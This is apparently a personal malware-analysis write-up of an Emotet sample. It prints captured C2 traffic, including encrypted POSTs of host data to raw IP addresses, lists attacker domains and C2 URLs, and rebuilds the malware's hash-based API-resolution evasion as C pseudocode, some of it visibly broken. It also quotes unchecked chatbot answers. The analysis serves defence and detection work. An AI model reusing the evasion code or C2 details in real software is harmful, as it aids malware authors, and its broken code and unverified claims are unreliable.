2023–02–28 11:31:14 192.168.56.101 57808 furstens.se 192.168.56.101 53 DNS Standard query 0xce5b A furstens.se
2023–02–28 11:31:25 192.168.56.101 59971 firstreport.com 192.168.56.101 53 DNS Standard query 0xf05c A firstreport.com
2023–02–28 11:31:38 192.168.56.101 60343 sarahbradley.com 192.168.56.101 53 DNS Standard query 0x525a A sarahbradley.com
2023–02–28 11:31:54 192.168.56.101 53304 belongings.com 192.168.56.101 53 DNS Standard query 0x721e A belongings.com

But there is no HTTP request because there is no Internet on my machine [ I can use the Internet but it’s only for private documents not publicly ].

and here is the same pcap file from MalwareTrafficAnalysis:

Let’s see the resolved IPs:

The 2nd domain:

Now, We want to know if is there an HTTP connection for those IPs.

Yes, the same link is provided in the phished email :

Let’s see the response to this link:

GET /Invoice-26396-reminder/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: bengalcore.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Type: application/msword
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Invoice 5499.doc"
Content-Transfer-Encoding: binary
X-Powered-By: ASP.NET
Date: Mon, 18 Sep 2017 14:25:25 GMT
Connection: close
Content-Length: 65024

Ok, this is the document we analyzed, from its strings we can see the base64 encoded code for the PowerShell command:

Strings command can help also.

let’s see the other IP:

The Full requests:

POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 23.254.97.211:8080
Content-Length: 372
Connection: Keep-Alive
Cache-Control: no-cache

......k.B1....c..LM..B...fU...Z.#.}]m..6..r."p.\g.Q."B
.u..<....y'....~....v!...MV.}..
../..)7$!P.7.. ...............K.t<.'.gS....v;_)....X_=DC..
.3`.'#
....p.e....E....C......#...g5.....9<........]V.<!....j..BX .J.. .Yn....!..(..g...mr.7..Q.o.....#.=.7..}........Nn4....~......}R..A.i.)R...
.R....u..Nge.C9By....!..31Joe].H*...1,or.J..]...K,J..g.....i~..[....x.... ...~$,

POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 46.101.8.170:8080
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache

.....A...f.Y......2[r..2m....o...cp..
Fn..\&..'.f...<......O.......)3q$!..H.@..p.e..A........`.;....c0nb.)t.......p.....]%7U5.pb.....3Ka*.(....4..
.J..f.,.gz...%....z.z=rK.....tP...x(
..:8h.y...O.?p.....N0....)..+.........<...x(.<.4}.3...?.#..q..\h.......jm.'............Qr.~.........Q}.|.m2.K.nL.~iCpo(../n..;.s ..>q.v....beO......]."...#.

POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 46.101.8.170:8080
Content-Length: 356
Connection: Keep-Alive
Cache-Control: no-cache

...r.
..3.V9e...)....QR;....q.......=-.\....yb:.]~."W.D#.[.4.Sj....59..5E.}...g.N"E...*.${?N.r"..d.......Lv,...+.Q.K.H..6....e.....O...O......N.
..G.6P....h......~H..A..n.v...Y.!].1..HT.. ,..N".....^..&Owy\.....?'.F.....Q...u.....,=<.wq.....W..m.A..R.0..n0...C...m.a.q1...,.{r.<o.!.....m"..Da...f.....Y.0.U{.j..........1......$s.kE..KW.z.......TYp...&..j..

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Sep 2017 14:31:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

.6................8...JZ....G'#_..?....?j..K...>p.#x.U.Z..x...]......w.ao.\..$.8=.h..o...9.....dP!c.J.i...w......./..q.+=&..'..@..(.........f.G.....

So, it sends data collected from the infected host to the C2 Server.

now we have 5 domains that we collected from Document Analysis:

focalaudiodesign.com
furstens.se
firstreport.com
sarahbradley.com
belongings.com

We can investigate those domains with the same techniques which I explain in Email Phishing Part, also you can see all the files related to these domains.

Like here:

https://www.virustotal.com/gui/domain/focalaudiodesign.com/relations

https://www.virustotal.com/gui/domain/furstens.se/relations

https://www.virustotal.com/gui/domain/firstreport.com/relations

https://www.virustotal.com/gui/domain/sarahbradley.com/relations

https://www.virustotal.com/gui/domain/belongings.com/relations

All malware files related to this domain, also here are IPs related to these domains:

173.254.14.237
66.147.242.93

64.41.86.47
208.91.197.27
64.41.87.41
64.41.94.112
64.26.26.113

213.146.173.149
213.146.173.150

96.45.82.126
96.45.83.51
96.45.83.150
96.45.82.249
192.155.244.20
216.117.140.21

89.221.250.20

You can do the same for all those domains and collect possible malware hashes, and IPs for the Emotet Malware. But as a Threat Researcher, we can write a Yara Rule to help us for catching all possible files related to the Emotet, we will discuss it later.

So the 2nd stage of Emotet malware will be downloaded from one of these domains, Then run with the PowerShell command above.

Let’s Analyze the executable file which I got from Maltrak Training and all of this analysis from me only.

figure 39: Malware Analysis Training — Real Scenarios from Maltrak By Eng. Amr Thabet

So I analyzed all of that then I saw the videos and it’s the same for my analysis [ Document and Code Analysis ], So Let’s go to:

Malware Basic Static Analysis:

Malware basic static analysis is a technique used to examine malware without executing it, in order to gain insight into its structure and behavior. The analysis is performed on a copy of the malware code or file, which is loaded into a specialized software tool for analysis.

sha256: 591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7

Let’s search on VirusTotal and I noticed some vendors catch it as TrickBot and some as Emotet:

I asked Chat-GPT:

Hello, I’m a malware analyst and want to know if is there a relationship between Emotet malware and Trickbot.

Yes, there is a relationship between Emotet malware and Trickbot. Emotet and Trickbot are two of the most prominent and sophisticated banking Trojans in recent years, and they are often used together in attacks to maximize their effectiveness.

Emotet is typically the initial infection vector, spreading through spam emails and malicious attachments. Once it has infected a system, it establishes a foothold and starts stealing sensitive information, such as login credentials and financial data.

Trickbot is often deployed as a second-stage payload in Emotet attacks. It is a modular malware that can perform a wide range of malicious activities, including stealing credentials, performing lateral movement, and deploying additional malware. Trickbot is often used to gain further access to compromised systems and move laterally across a network.

The two malware families have been observed working in tandem in many high-profile attacks, including those against financial institutions, governments, and healthcare organizations. They are typically used by cybercriminals to steal large amounts of sensitive data, including financial information, intellectual property, and personally identifiable information.

In addition to their technical similarities and the way they are used in attacks, there is also evidence to suggest that the two malware families are operated by the same group of cybercriminals, or at least have a strong connection to one another. Both Emotet and Trickbot have been attributed to the cybercrime group known as TA542 or Mealybug, which is believed to be based in Eastern Europe.

Overall, the relationship between Emotet and Trickbot highlights the growing sophistication of cybercrime and the need for strong cybersecurity measures to protect against these threats.

Thanks, Chat-GPT, Yes, TrickBot is the 2nd stage for the Emotet Malware and we can say here it’s our 3rd stage because our first stage is the document file, 2nd stage is the Emotet Malware, and the 3rd stage may be our TrickBot Malware, we will see.

Relations from VirusTotal which other URLs, and IPs which not included in Email Phishing Analysis and Document Analysis so we need from Code Analysis to know which of these IPs our file will connect:

http://24.45.195.162:8443/enabled/health/
http://80.11.163.139:443/sess/
http://24.45.195.162:7080/xian/attrib/sess/merge/
http://201.184.105.242:443/symbols/publish/
http://133.167.80.63:7080/tpt/between/sess/
http://94.192.225.46/codec/enabled/
http://198.199.114.69:8080/between/pdf/sess/
http://80.79.23.144:443/psec/attrib/

Let’s continue analyzing the Emotet Statically:

file-size,58880 (bytes)

entropy,6.805 [ Packed ]

compiler-stamp,0x5D9246E9 (Mon Sep 30 11:18:17 2019
— UTC) [ maybe fake ].

GUI/32bit

machine,Intel

real-checksum,0x0000F4C5

sections which include.CRT and after Googling, I found this link:

.crt section? What does this warning mean?

Thanks for contributing an answer to Stack Overflow! Please be sure to answer the question. Provide details and share…

stackoverflow.com

the CRT section likely refers to the Microsoft C Runtime Library (CRT), which is a set of routines and functions that provide basic support for programming in the C language.

When a C program is compiled, the compiler generates machine code that depends on the CRT to provide support for things like memory allocation, input/output operations, and other common programming tasks. The CRT is typically linked into a program at compile-time, and the resulting executable includes a copy of the CRT code.

So In our case, the CRT section may contain code related to the implementation of the C language runtime, such as the standard C library functions used by the malware’s code. It is possible that this section may also contain custom functions or code specific to the malware’s operation, or unpacking process, maybe.

It has only one API called IsProcessorFeaturePresent from kernel32.dll and now we are sure 100% is packed.

and from the DetectItEasy tool, there is no output:

It’s highly obfuscated -_-

Let’s move to our 4th analysis:

Behavioral Malware Analysis:

Behavioral malware analysis is a technique used to examine malware by observing its behavior when executed in a controlled environment. Unlike basic static analysis, which examines the code of the malware without executing it, behavioral analysis involves actually running the malware to see what it does and how it behaves.

Behavioral malware analysis typically involves setting up a sandbox environment or virtual machine, where the malware can be executed in a controlled and isolated environment. The behavior of the malware is then monitored and recorded, and any changes made to the system are analyzed.So, Don’t run the malware in your host, You should have a virtual machine for analyzing.

In this part, we will run the malware in our own sandbox and not in an online sandbox, Malware Analysts don’t prefer that.

So, we need to open the Process Hacker tool or Process Explorer [ which you prefer ] with the Process Monitor tool, and FakeNet Tool.

Then run the malware.

Here in the Process Hacker, we saw a new process called sizesxcl.exe, let’s see its details:

The image path for this process exists in the AppData folder which in my case is: C:\Users\User\AppData\Local\

and created a folder with the name: sizesxcl in the AppData folder which the process image exists under the name: sizesxcl.exe

The AppData\Local directory contains data that is specific to the user’s account, such as application settings, temporary files, and cached data. This directory is used by many applications on Windows, including web browsers, media players, and productivity software.

ٍIt’s our first IOC, and the command line for this process is — c98206a6, we need to know in Code Analysis what it refers to.

let’s open this folder: C:\Users\User\AppData\Local\sizesxcl

It has the same size and the same date modified !! [ we are in 2023 and the process created in 2023, so why the modified date is 2019? ], Yes, it copies itself to this folder.

But let’s Get the hash of this file to make sure we pretended right to not:

As you can see, its hash is: 591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7

The same hash for the Emotet Main Executable, so it’s a virus [ can copy itself to another location ].

Ok, now we got our first IOC which runs with command — c98206a6.

Let’s see other details:

We can see, there is an event called \BaseNamedObjects\EEE85EDF4

What’s the event?

An event is a synchronization mechanism that allows threads or processes to communicate with each other.

In Windows operating systems, an event is a kernel object that is created using the CreateEvent API. An event can have two states: signaled or non-signaled. When an event is signaled, it means that one or more threads or processes are waiting for it to be signaled, and when it is non-signaled, it means that no threads or processes are waiting for it.

The SignalObjectAndWait API is used to signal one event and wait for another event to be signaled. This API can be used to coordinate the actions of multiple threads or processes, and to synchronize the execution of different parts of a program.

Malwares may use the CreateEvent and SignalObjectAndWait APIs to create a hidden communication channel between threads or processes, to perform stealthy operations, or to evade detection by anti-virus software and other security measures.

So malwares use it because they want to achieve inter-process communication (IPC) between two or more threads or processes.

So this event name can help us for identifying the malware in the infected hosts and also for malware detection if it runs again in a different hash.

It’s like a mutex for identifying the malware in the host so, it will be our second IOC.

A lot of registry keys that malware opened belong to the Internet browsers and we need to know what can malware do with these.

We have now the 3rd IOC which has a mutex name: \BaseNamedObjects\MEE85EDF4 and this can help us with the detection also. The mutant can be used to ensure that only one instance of the malware is running on the system at any given time.

Also, the section name: \BaseNamedObjects\F932B6C7–3A20–46A0-B8A0–8894AA421973 can help us if the malware performing suspicious activities, such as making network connections to known command-and-control servers, downloading and executing additional malware, or modifying system settings, then this may be an indication that the section object is being used by malware. In this case, further analysis may be necessary to identify the specific malware involved and mitigate its impact on the system.

so now we have these IOCs collected from the process hacker and registry keys not selected because I didn’t find paths related to the malware or written info:

C:\Users\User\AppData\Local\sizesxcl\sizesxcl.exe— c98206a6 [ maybe command line random ].

EEE85EDF4 [event name, can be random also or targeted]

MEE85EDF4 [mutex name, can be randomly also or targeted]

F932B6C7–3A20–46A0-B8A0–8894AA421973 [ section name ]

Let’s see the Process Monitor tool:

Another file was created to C:\Users\User\AppData\Local\machinemachine\machinemachine.exe

but not exists:

and it opens it for deleting:

So the malware search for this path for removal, Why? asked Chat-GPT,

it may be related to Emotet’s self-defense mechanisms. By deleting this file, Emotet may be attempting to prevent other malware from infecting the same system, or it may be attempting to remove traces of other malware that may be present on the system.

It is important to note that Emotet is a constantly evolving malware threat, and its behavior and capabilities may change over time. Therefore, it is possible that the reasons for its search and deletion of the “C:\Users\User\AppData\Local\machinemachine\machinemachine.exe” file may differ in different versions of the malware.

I thought it related to its old variant, but Google and Chat-GPT did not include info for this file.

Then the malware removes Zone.Identifier attribute from the dropped executable file.

The “Zone.Identifier” file attribute is used by Windows to indicate the security zone from which a file originated, and it helps prevent users from accidentally executing potentially dangerous files. Malware may attempt to delete this attribute from downloaded files to evade detection and increase the likelihood of executing the file. Finding malware that attempts to delete the “Zone.Identifier” attribute may indicate malicious activity.

We can say, you can’t track the executable file from its metadata unless other metadata such as file size, file hash, creation date, and modification date.

then added a random value to a registry key:

‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475’

with value: 4C 27 00 00 00 00 00 00 04 00 04 00 01 02 05 00

The registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475 is used by the Windows Notification Center to store data related to notifications that are displayed to the user. The value that the malware added (4C 27 00 00 00 00 00 00 04 00 04 00 01 02 05 00) is a binary value that represents the data for a specific notification.

The exact meaning of the value depends on the specific notification being created, but in general, the binary data will include information such as the notification title, message, icon, and actions that the user can take in response to the notification.

In the case of malware, it’s possible that the notification data is being used to display fake or misleading notifications to the user as part of a social engineering or phishing attack. However, without further analysis, it’s difficult to say for sure what the notification data is being used for.

Here, the Emotet QueryFullSizeInformationVolume for C:// partition may use specific information for its behavior, which we will see later.

And there is no connection to the Internet and that means the Emotet detected the VM.

Code Analysis:

Malware code analysis is the process of examining the code of malware to understand its behavior and functionality. It is an important technique used in malware analysis to identify how the malware works and to develop countermeasures to prevent its spread.

Malware code analysis can be performed using static or dynamic techniques. Static analysis involves examining the code without executing it, while dynamic analysis involves running the malware in a controlled environment to observe its behavior.

During malware code analysis, the analyst typically examines the code for characteristics such as:

Malicious functionality: The analyst looks for code that performs malicious activities, such as stealing information, damaging data, or exploiting vulnerabilities.
Code obfuscation: Malware often uses techniques to make the code difficult to read and understand, such as encryption or compression. The analyst must be able to decode the obfuscated code to understand the malware’s behavior.
Interaction with the system: Malware often interacts with the operating system and other software to perform its functions. The analyst examines how the code interacts with the system to identify any suspicious activity.
Persistence mechanisms: Malware often includes mechanisms to ensure it remains on the system after a reboot or other system changes. The analyst looks for code that sets up these persistence mechanisms.

Malware code analysis is a complex process that requires specialized knowledge and tools. It is an important technique used in malware analysis to understand the behavior and functionality of malware and to develop effective countermeasures.

After we know it’s packed, let’s analyze the code next to know what the code looks like, I used IDA Pro:

There are 2 subroutines then calling the global value dword_40FAF8 which will be a dynamic calling function(subroutine), and then calling sub_401A52 with hex arguments 16AD7ADBh, offset unk_40E9D0:

it’s a hex string, it may be an encryption/decryption function, Let’s analyze the first subroutine: sub_40AE65

some hex values and then calling 2 subroutines:

UnPacking:

Malware unpacking is the process of extracting the original executable code from a packed or obfuscated malware file. Malware authors often use packing and obfuscation techniques to make it more difficult for antivirus software to detect and analyze their malware.

Let’s see the 1st subroutine:

First, it takes the current PEB ( Process Environment Block ) then adds 0C to get the Loader Data that Contains information about the loaded modules for the process, then adds 30h to get InLoadOrderModuleList, which is The head of a doubly-linked list that contains the loaded modules for the process. Each item in the list is a pointer to an LDR_DATA_TABLE_ENTRY structure [ MDSN ].

The Malware instead of calling GetModuleHadnle, he writing its own GetModuleHandle API which will get the address of any Library he wants.

it’s a loop for getting the handle of some libraries which the loop body includes another subroutine called: sub_401161, let’s see it:

a function for checking the letters if it < ‘A’ and > ‘Z’ multiply it with 1003Fh value, else, add to 20h which converts UpperCase to LowerCase then multiply it to 1003Fh

So it performs some string manipulation. It takes in a string and converts any uppercase alphabetic characters to lowercase. Then, it computes a hash of the resulting string using multiplication and addition operations and returns the resulting hash value.

Here is the C code for it:

unsigned int calculate_hash(char *string)
{
    unsigned int hash = 0;

    for (int i = 0; string[i] != '\0'; i++) {
        if (string[i] >= 'A' && string[i] <= 'Z') {
            hash = hash * 0x1003F + (string[i] + 0x20);
        } else {
            hash = hash * 0x1003F + string[i];
        }
    }

    return hash;
}

So now the malware pushed some hash and then gets the address of the library with its hard-coded hash, and with the help of PE Parsering from Sektor7 with Chat-GPT, here is the code for it:

- — — →[| pseudo code |]← — — -

unsigned int calculate_hash(char *string);

//This is not an stable code for compiling, It's a pseudo Code
void* sub_4012CD() {
    void* pRet = NULL;
    
    // Get handle of current module
    HMODULE hModule = hlpGetModuleHandle(NULL);
    if (!hModule) {
        return NULL;
    }

    // Get pointer to PEB structure
    PEB* pPeb;
#ifdef _M_IX86 
    pPeb = (PEB *)__readfsdword(0x30);
#else
    pPeb = (PEB *)__readgsqword(0x60);
#endif

    // Get pointer to LDR_DATA_TABLE_ENTRY of current module
    PEB_LDR_DATA* pLdr = pPeb->Ldr;
    LDR_DATA_TABLE_ENTRY* pLdrEntry = (LDR_DATA_TABLE_ENTRY*)pLdr->InMemoryOrderModuleList.Flink;

    // Calculate hash of current module name
    unsigned int hash = calculate_hash(pLdrEntry->BaseDllName.Buffer);

    // Traverse the list of loaded modules to find the module with matching hash
    while (pLdrEntry->DllBase != NULL) {
        if (calculate_hash(pLdrEntry->BaseDllName.Buffer) == hash) {
            pRet = pLdrEntry->DllBase;
            break;
        }
        pLdrEntry = (LDR_DATA_TABLE_ENTRY*)pLdrEntry->InMemoryOrderLinks.Flink;
    }

    return pRet;
}

unsigned int calculate_hash(char *string) {
    unsigned int hash = 0;

    for (int i = 0; string[i] != '\0'; i++) {
        if (string[i] >= 'A' && string[i] <= 'Z') {
            hash = hash * 0x1003F + (string[i] + 0x20);
        } else {
            hash = hash * 0x1003F + string[i];
        }
    }

    return hash;
}

I gave the Chat-GPT GetModuleHandle C code implementation and the assembly code for the Malware code, and he helped me to get this output, yes I can do it myself, but Time is important now.

So now we can assume the first subroutine is GetModuleHandle API with a custom implementation.

Let’s return to the main function:

Let’s assign all of these variables in one value:

array = [0xEA27F57E, 0x720817C, 0xC95EB213, 0xF25D1C42, 0x6791D351, 0x87C5E249, 0xD0269DAA, 0x3836CA80,
         0xBD617990, 0x79E2CB04, 0xAC2386F6, 0xFE97B9D6, 0xA57FDC4C, 0x8D44646F, 0x2D319B9B, 0xB26F02C9,
         0x101F18C7, 0x28026C35, 0x71B71D9E, 0x039151E5, 0x79F31B20, 0x8FC42BE7, 0x1A7EBAF1, 0x5C623FBD,
         0x9BDDBF41, 0x3111578E, 0x30A26400, 0x2F19DA53, 0xBE51B21F, 0x3744FEF8, 0xCCECF5A8, 0xC1AC8AF1,
         0xD9A5CB84, 0xA4FEF55F, 0x5A9E215F, 0xD3754026, 0xD435ECE4, 0xD9AFD1FF, 0xC88AEFA9, 0x5B62853A,
         0xADD8E5B1, 0x69267142, 0xA71F97BA, 0x493F5C34, 0x2EF565EF, 0xDDD3D816, 0x1C623B62,
    0x0DDD3D816, 0x1C623B62, 0x0DCD579A7, 0x0A1CE0453,
    0x08DC70D65, 0x40ECE3F9, 0x0A57EF104, 0x0E739F937,
    0x252DCC50, 0x0DC9C8E7, 0x0F03EB80E, 0x0ECCABC8A,
    0x369369C5, 0x21D91901, 0x18579FE8, 0x377DEA57,
    0x09BFF814B, 0x0B2324515, 0x6A3E4570, 0x09ADDF532,
    0x0EC18438B, 0x0C190CB4, 0x0AFA0B432, 0x07B2BB235,
    0x06B51373D, 0x059647C10, 0x0D5ECB7B7, 0x0B1235257,
    0x01757AA44, 0x0C8B376EC, 0x0733139F9, 0x0CE477BF9,
    0x03AE655B, 0x0956C3957, 0x0C9A0BE96, 0x0C72F0067,
    0x0BAFC9F4, 0x046E779C8, 0x0AA2F4C1F, 0x0E8A6803D,
    0x05E60CBA, 0x0A4C2732E, 0x0B430C20E, 0x0120D97B8,
0x50312547, 0x606F1F15, 0xC3B1AFDF, 0xD1EDD969,
0x8AC831FB, 0x84203C8C, 0x5FBD6613, 0x23E5DD74,
0xE5ECA683, 0x7962E6FF, 0xF50FBFA7, 0x6A07AF9F,
0x0DC3D95C, 0xD65A6E67, 0x0BE68A60, 0xB50246C6,
0x420D1F7A]

#in Python
hash = b'\x7e\xf5\x27\xea\x0c\x17\x08\x72\x13\xb2\x5e\xc9\x42\x1c\x5d\xf2\x51\xd3\x91\x67\x49\xe2\xc5\x87\xaa\x9d\x26\xd0\x80\xca\x36\x38\x90\x61\xbd\x04\xcb\xe2\x79\xf6\x86\x23\xac\xd6\xb9\x97\x5f\xdc\x7f\x8d\x46\x6f\x64\x44\x1f\x10\x35\x6c\x02\x28\x9e\x1d\xb7\x71\xe5\x51\x91\x03\x20\x1b\xf3\x79\xf1\xba\x7e\xbd\x3f\x62\x5c\x41\xbf\xdd\x8e\x57\x11\x31\x00\x64\xa2\x0a\xda\x19\x2f\x1f\xb2\x51\xbe\x21\xca\xf5\xec\xcc\xf8\x8a\xc1\x84\xcb\xa5\x5f\xf5\xfe\x4d\x21\x5e\x9e\x5a\x26\x40\x75\xd3\xe4\xec\x35\x43\xd1\xaf\xd9\xa9\xef\x8a\x8a\x3a\x85\x62\xb1\xe5\xd8\x42\x71\x26\x69\x42\x97\x1f\xba\x97\x3f\x49\xef\x65\xf5\xdd\x16\xd8\x3b\x62\x3b\x16\xdd\x16\xdd\x7a\xf8\x57\x9f\x51\xef\x65\x2e\xdd\x50\xcc\xc8\xdc\x80\xeb\x03\x7f\x0b\xfa\xa1\x53\xe0\x75\x87\x80\xeb\x38\xd6\xcc\x03\xef\x03\x1f\x18\x79\xca\x9b\x7e\x5a\xb3\x86\x24\xa6\xf5\x97\x21\x5f\x21\x40\x75\x35\xd3\xff\xd1\xaf\x88\xa1\xbb\xb2\xb4\x87\xb7\xec\xeb\x6f\x17\x60\xfa\x7e\x02\xcb\x6c\x2e\x96\x6d\xf4\x4c\x5c\x9f\x57\x54\x31\x50\x47\x25\x31\x15\x1d\xc5\x69\xd9\xed\xb1\xc3\x8c\x20\x84\x13\x66\xbd\x74\xdd\xe5\x83\xa6\xec\x62\x79\x6e\xf5\x0f\xa7\xbf\xd9\x6e\x5a\xc3\x3d\xdc\x60\x8a\xbe\x46\x02\x7a'

Let’s analyze the second subroutine:

Let’s open it:

It calling another subroutine, let’s analyze it:

It’s a big loop -__-, Let’s see the first subroutine:

It’s related to the same hashing value which we analyzed earlier

Let’s see the second subroutine:

Ok, I’m not focusing on the encryption/decryption algorithm, I’m only focusing on the important details, so here is the Malware using again its own GetModuleHandle with the output from toLowerCaseWhichAnalzed earlier:

Ok, we can say it resolves the APIs from a Library.

So now we have some hex value and it’s very big, get the address of some libraries, resolving some APIs to every specific library.

Here is the final result:

array = [0xEA27F57E, 0x720817C, 0xC95EB213, 0xF25D1C42, 0x6791D351, 0x87C5E249, 0xD0269DAA, 0x3836CA80,
         0xBD617990, 0x79E2CB04, 0xAC2386F6, 0xFE97B9D6, 0xA57FDC4C, 0x8D44646F, 0x2D319B9B, 0xB26F02C9,
         0x101F18C7, 0x28026C35, 0x71B71D9E, 0x039151E5, 0x79F31B20, 0x8FC42BE7, 0x1A7EBAF1, 0x5C623FBD,
         0x9BDDBF41, 0x3111578E, 0x30A26400, 0x2F19DA53, 0xBE51B21F, 0x3744FEF8, 0xCCECF5A8, 0xC1AC8AF1,
         0xD9A5CB84, 0xA4FEF55F, 0x5A9E215F, 0xD3754026, 0xD435ECE4, 0xD9AFD1FF, 0xC88AEFA9, 0x5B62853A,
         0xADD8E5B1, 0x69267142, 0xA71F97BA, 0x493F5C34, 0x2EF565EF, 0xDDD3D816, 0x1C623B62,
    0x0DDD3D816, 0x1C623B62, 0x0DCD579A7, 0x0A1CE0453,
    0x08DC70D65, 0x40ECE3F9, 0x0A57EF104, 0x0E739F937,
    0x252DCC50, 0x0DC9C8E7, 0x0F03EB80E, 0x0ECCABC8A,
    0x369369C5, 0x21D91901, 0x18579FE8, 0x377DEA57,
    0x09BFF814B, 0x0B2324515, 0x6A3E4570, 0x09ADDF532,
    0x0EC18438B, 0x0C190CB4, 0x0AFA0B432, 0x07B2BB235,
    0x06B51373D, 0x059647C10, 0x0D5ECB7B7, 0x0B1235257,
    0x01757AA44, 0x0C8B376EC, 0x0733139F9, 0x0CE477BF9,
    0x03AE655B, 0x0956C3957, 0x0C9A0BE96, 0x0C72F0067,
    0x0BAFC9F4, 0x046E779C8, 0x0AA2F4C1F, 0x0E8A6803D,
    0x05E60CBA, 0x0A4C2732E, 0x0B430C20E, 0x0120D97B8,
0x50312547, 0x606F1F15, 0xC3B1AFDF, 0xD1EDD969,
0x8AC831FB, 0x84203C8C, 0x5FBD6613, 0x23E5DD74,
0xE5ECA683, 0x7962E6FF, 0xF50FBFA7, 0x6A07AF9F,
0x0DC3D95C, 0xD65A6E67, 0x0BE68A60, 0xB50246C6,
0x420D1F7A];

unsigned int calculate_hash(char *string);

void* getmodulehandle(106,0CAC88F9h, ) {
    void* pRet = NULL;
    // Get pointer to PEB structure
    PEB* pPeb;
#ifdef _M_IX86 
    pPeb = (PEB *)__readfsdword(0x30);
#else
    pPeb = (PEB *)__readgsqword(0x60);
#endif

    // Get pointer to LDR_DATA_TABLE_ENTRY of current module
    PEB_LDR_DATA* pLdr = pPeb->Ldr;
    LDR_DATA_TABLE_ENTRY* pLdrEntry = (LDR_DATA_TABLE_ENTRY*)pLdr->InMemoryOrderModuleList.Flink;

    // Calculate hash of current module name
    unsigned int hash = calculate_hash(pLdrEntry->BaseDllName.Buffer);

    // Traverse the list of loaded modules to find the module with matching hash
    while (pLdrEntry->DllBase != NULL) {
        if (calculate_hash(pLdrEntry->BaseDllName.Buffer) == hash) {
            pRet = pLdrEntry->DllBase;
            break;
        }
        pLdrEntry = (LDR_DATA_TABLE_ENTRY*)pLdrEntry->InMemoryOrderLinks.Flink;
    }

    return pRet;
}

unsigned int calculate_hash(char *string) {
    unsigned int hash = 0;

    for (int i = 0; string[i] != '\0'; i++) {
        if (string[i] >= 'A' && string[i] <= 'Z') {
            hash = hash * 0x1003F + (string[i] + 0x20);
        } else {
            hash = hash * 0x1003F + string[i];
        }
    }

    return hash;
}

Let’s see the x64 debugger to make it clear, Ok we have 3 arguments:

And here is every loaded library before calling:

after calling it, here the EDX value for ntdll.dll is D22E2014 which exists in the hardcoded of the large hex value :) :

Yes, now it’s clear, All of these value is hardcoded value for important strings in the Emotet Malware, So these hardcoded values are important for our Yara Rule and it’s a good detection for it.

and here is the hardcoded for our malware name which does not exist in the hardcoded of the Emotet Malware, so, you can find the right name of the Malware name by finding its hardcoded existence in the large hex number or not[ but it must include the right name first]:

And here is the Hardcoded for others:

8F7EE672 [kernel32.dll] -> it searched for it, and after he found it he returns.

Then get the APIs of the library and each and every API gets hardcoded then compare it to these values:

DD 21 2F 64 4F 54 6A A5 17 5E D2 59 87 68 03 52 18 5F 79 3F 62 A1 00 44 73 6A 44 CF 9C 13 5B 8F 8C 20 4C 6E 07 74 67 D1 D9 FD 03 AD F5 44 A0 6F 84 06 4B 59 23 2E F5 13 F2 17 98 A0 64 50 BA 91 F3 59 72 75 47 BE 31 F3 9F C1 1F 1F A3 A9 0A 6D D5 38 32 EE 7E F4 D2 6D 07 0A 85 A3 1D 98 76 01 5F C4 19 52 53 A7 F3 5D 0A 67 C3 99 AE C8 91 02 BA E7 AA F1 FC 25 1B C3 0A B6 A0 4A CE 03 77 4B 75 2B 40 3D 5D E2 06 4D F0 2C 5D 02 98 4F 59 DC 99 52 D3 87 A4 7A 2B 6B EF 33 EC A9 72 5E 3C 9A A5 9B 70 03 FC F5 89 45 88 3A 02 AF 37 62 BD 34 28 AD 11 9D 19 F8 06 21 99 D0 5B AB ED 99 81 6F D3 2A CB EE 9F C6 1B D6 89 A2 F8 89 FA 40 6E E6 9E E9 DC D3 21 E6 DB AB 07 01 FC B9 0B 87 B4 F0 59 DC 97 06 BE C3 EA 54 32 D4 93 3D A8 25 79 B5 95 D8 A3 25 57 70 5D 95 71 BB F5 67 66 61 E2 BE 50 EF D2 30 6A 3D 74 78 2A E3 3E AB F7 34 61 25 3D 85 C5 F3 B2 5B 99 76 E4 EB 8C 40 BC 4C 6A C0 3D 36 22 29 7B 5C 44 B2 29 66 99 F3 5B 7B 8C FA 36 89 05 65 C6 CD 33 CD 9D D8 CB 0B D2 CF 85 19 12 7A 08 BD 32 F5 E4 33 FE 44 85 E2 00 0D 6B 02 8A 27 68 67 23 7A 03 D9 E3 04 37 FF F8 EE 4D 21 48 7C 59 77 41 26 D4 83 E0 CF C0 F9 4B BE 98 31 1D 14 AD DC 58 2E 3D 9E 9C 54 27 43 D8 CE 7C AB B8 E4 90 61 20 85 B5 6E 22 55 85 3F 58 1D 8C F9 73 85 3B 10 7F 70 41 5C 0E 34 2B FB 23 C5 66 E8 4F 66 C0 15 CE 52 CB 3F 60 E3 9C C4 30 11 CD 54 8B C1 96 82 C2 85 98 E7 F0 79 96 9B 5A F2 0B B3 A9 13 C5 33 1B 7D 4E E8 7E 23 C5 6D 9D 2B 95 25 C1 4D FF 99 7E 9E AE 86 51 47 C8 B4 A6 CF FE 29 59 FA FC 8F E1 19 E9 B6 EB 99 C2 A1 59 B7 38 9C 5E 66 E5 5F BE 4E 10 2E 47 17 C6 12 88 DF 16 A1 